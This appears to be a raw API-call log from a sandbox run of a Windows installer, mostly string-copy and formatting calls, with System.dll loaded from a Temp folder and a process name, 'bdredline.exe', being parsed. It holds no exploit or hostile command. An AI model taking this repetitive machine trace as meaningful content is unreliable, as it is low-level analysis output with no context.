iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.372] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.372] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.373] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.373] lstrlenA (lpString="3297464") returned 7 [0158.373] lstrcpynA (in: lpString1=0x3387a4, lpString2="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)", iMaxLength=1024 | out: lpString1="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)") returned="*3297464(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)" [0158.373] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.373] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 
| out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.373] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.373] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.373] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.373] lstrcpyA (in: lpString1=0x33e508, lpString2="3297464" | out: lpString1="3297464") returned="3297464" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.373] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] lstrcpynA (in: lpString1=0x3405e8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: 
param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] lstrcpyA (in: lpString1=0x430800, lpString2="0" | out: lpString1="0") returned="0" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="248") returned 3 [0158.374] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.374] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="3297464") returned 7 [0158.374] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.375] lstrcmpiA 
(lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.375] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x3387a4, lpString2="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0", iMaxLength=1024 | out: lpString1="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0") returned="kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0" [0158.375] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.375] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.375] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: 
lpString1="Call") returned="Call" [0158.375] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.375] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.375] lstrcpyA (in: lpString1=0x33f5c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.375] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.376] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.376] lstrcpynA (in: lpString1=0x3401e0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.376] lstrcpynA (in: lpString1=0x33f9d0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.376] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.376] lstrcpyA (in: lpString1=0x431400, lpString2="" | out: lpString1="") returned="" [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="-1") returned 2 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.376] lstrcpyA 
(in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.376] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.376] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.376] lstrcpynA (in: lpString1=0x3387a4, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.376] lstrcpynA (in: lpString1=0x338bec, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.376] lstrcpynA (in: lpString1=0x42e3a1, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.377] lstrlenA (lpString="") returned 0 [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x430400, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x338bec, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2=",", 
iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrlenA (lpString="0") returned 1 [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x33947c, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x430000, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x338bec, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x3387a4, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.377] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | 
out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x339034, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x432800, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x3387a4, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x339034, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33947c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrlenA (lpString="3297464") returned 7 [0158.378] lstrcpynA (in: lpString1=0x3398c4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.378] lstrlenA (lpString="248") returned 3 [0158.378] lstrcpynA (in: lpString1=0x339d0c, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.378] lstrlenA (lpString="") returned 0 [0158.378] lstrcpynA (in: lpString1=0x33a154, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrlenA (lpString="0") returned 1 [0158.378] lstrcpynA (in: lpString1=0x33a59c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.378] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.378] lstrlenA (lpString="3297464") returned 7 [0158.378] lstrcpynA (in: lpString1=0x33a9e4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33ae2c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33b274, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.379] lstrlenA (lpString="User") returned 4 [0158.379] lstrcpynA (in: lpString1=0x33b6bc, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x33bb04, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrlenA (lpString="") returned 0 [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 
[0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x430800, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x430400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.379] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrlenA (lpString="/") returned 1 [0158.379] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.379] lstrcpynA (in: lpString1=0x40b018, lpString2="E", iMaxLength=1024 | out: lpString1="E") returned="E" [0158.379] lstrcmpiA (lpString1="/", lpString2="E") returned -1 [0158.379] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.380] lstrlenA (lpString="") returned 0 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="+", iMaxLength=1024 | out: lpString1="+") returned="+" [0158.380] lstrcmpiA (lpString1="/", lpString2="+") returned -1 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") 
returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="-", iMaxLength=1024 | out: lpString1="-") returned="-" [0158.380] lstrcmpiA (lpString1="/", lpString2="-") returned 1 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrlenA (lpString="/") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="/", iMaxLength=1024 | out: lpString1="/") returned="/" [0158.380] lstrcmpiA (lpString1="/", lpString2="/") returned 0 [0158.380] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.380] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.380] lstrcpynA (in: lpString1=0x40ac18, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.380] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.380] lstrcmpiA (lpString1="bdredline.exe,", lpString2="") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431400, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] lstrlenA (lpString="0") returned 1 [0158.380] lstrcpynA (in: lpString1=0x431800, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.380] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.380] lstrlenA (lpString=",") returned 1 [0158.380] lstrcpynA (in: lpString1=0x40a418, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrlenA (lpString=",") returned 1 [0158.381] wsprintfA (in: param_1=0x431c00, param_2="%d" | out: param_1="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.381] lstrlenA (lpString="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.381] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.381] lstrcpynA (in: lpString1=0x432000, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40ac18, lpString2="b0", iMaxLength=1024 | out: lpString1="b0") returned="b0" [0158.381] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrcmpiA (lpString1="b0", lpString2="0") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") 
returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40a418, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.381] lstrlenA (lpString="1") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrlenA (lpString="b") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40ac18, lpString2="b", iMaxLength=1024 | out: lpString1="b") returned="b" [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrlenA (lpString=",") returned 1 [0158.381] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.381] lstrcmpiA (lpString1="b", lpString2=",") returned 1 [0158.381] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.381] lstrlenA (lpString="0") returned 1 [0158.382] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.382] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.382] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," 
